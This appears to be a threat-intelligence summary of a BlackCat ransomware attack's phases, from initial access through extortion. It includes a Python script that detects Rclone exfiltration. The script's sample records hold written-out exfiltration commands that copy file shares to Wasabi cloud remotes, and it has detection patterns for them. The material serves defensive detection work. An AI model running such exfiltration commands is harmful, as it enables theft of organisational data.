# Phase 1: Initial Access and Foothold (days 1-5)

The threat actor initiated the attack by first compromising the network of a third-party vendor, then used a local terminal server in the client’s network as a pivot point from which to launch the attack.

# Phase 2: Lateral Movement (days 6-20)

The threat actor used several remote code execution techniques and the Cobalt Strike platform to move laterally between the victim’s on-premises domains and Azure environment through RDP and tunneled connections.

# Phase 3: Data Exfiltration and Additional Lateral Movement (days 27-30)

Using the Rclone tool, the threat actor exfiltrated a high volume of data from local servers to the cloud file storage service Wasabi.

# Phase 4: Extortion Attempts (days 30-45)

The threat actor flooded the victim with email messages threatening to publish sensitive information if a ransom was not paid, while exaggerating the volume and sensitivity of the stolen information.
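A defender-side illustration of the Phase 3 technique, as an added example that is not part of the original article: a small Python triage script that scans process-creation records for Rclone transfer commands and Wasabi S3 endpoints (`wasabisys.com`), including the case where the binary has been renamed but still carries rclone-specific arguments. The sample records, hostnames, remote names and paths are constructed for this example.

```python
import re
import shlex

# Constructed process-creation records (not from the article):
# (hostname, parent image, command line).
SAMPLE_EVENTS = [
    ("FS01", "explorer.exe", r'"C:\Program Files\7-Zip\7z.exe" a backup.7z D:\Finance'),
    ("FS01", "cmd.exe", r'rclone.exe copy D:\Finance wasabi:corp-dump --transfers 32 --config C:\Users\Public\rc.conf'),
    ("DC02", "powershell.exe", r'C:\Windows\Temp\svchost.exe sync \\FS01\Shares s3:exfil --s3-endpoint https://s3.us-east-2.wasabisys.com'),
    ("WS17", "explorer.exe", r'rclone.exe mount onedrive: X:'),
]

# Rclone subcommands that move data to a remote; "mount" alone is not flagged.
TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
# Real rclone options (--transfers, --config, --s3-endpoint) and remote:path syntax,
# used to recognise an rclone binary that has been renamed.
RCLONE_MARKERS = re.compile(r"--(transfers|config|s3-endpoint)\b|\b(s3|wasabi)\w*:", re.I)
# Wasabi's S3 endpoint domain is the reliable indicator; remote names are user-chosen.
WASABI_RE = re.compile(r"wasabisys\.com", re.I)

def classify(cmdline):
    """Return a list of findings for one process command line."""
    try:
        # Non-POSIX mode keeps Windows backslashes literal and quoted paths intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    if not argv:
        return []
    findings = []
    image = argv[0].strip('"').lower()
    is_rclone = image.endswith("rclone.exe") or image.endswith("rclone")
    looks_like_rclone = bool(RCLONE_MARKERS.search(cmdline))
    verb = argv[1].lower() if len(argv) > 1 else ""
    if (is_rclone or looks_like_rclone) and verb in TRANSFER_CMDS:
        findings.append("rclone-transfer")
        if not is_rclone:
            findings.append("renamed-binary")
    if WASABI_RE.search(cmdline):
        findings.append("wasabi-endpoint")
    return findings

def scan(events):
    """Return (host, findings) for every record that produced at least one finding."""
    out = []
    for host, _parent, cmd in events:
        hits = classify(cmd)
        if hits:
            out.append((host, hits))
    return out
```

Running `scan(SAMPLE_EVENTS)` flags the two transfer commands (FS01 and DC02) and leaves the archive creation and the mount alone; the DC02 record is the renamed-binary case with an explicit Wasabi endpoint.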
All articles related to “BlackCat”:

- BlackCat ransomware shuts down in exit scam, blames the “feds”
- The Anatomy of a BlackCat (ALPHV) Attack
- Cyberattack Fallout: Minnesota Hospitals Grapple with Financial Strain
- BlackCat ransomware turns off servers amid claim they stole $22 million ransom
- Prescription Insecurity: The Russian Connection to Healthcare Cyber Attacks
- BlackCat Ransomware Hit Healthcare Giant Optum, Stolen 6TB Sensitive Data
- No Bad Luck for Darktrace: Combatting ALPHV BlackCat Ransomware | Darktrace Blog
- BlackCat Ransomware Gang Claims Attack on Change Healthcare
- BlackCat Ransomware Affiliate TTPs | Huntress
- Pharmaceutical giant Cencora discloses a data breach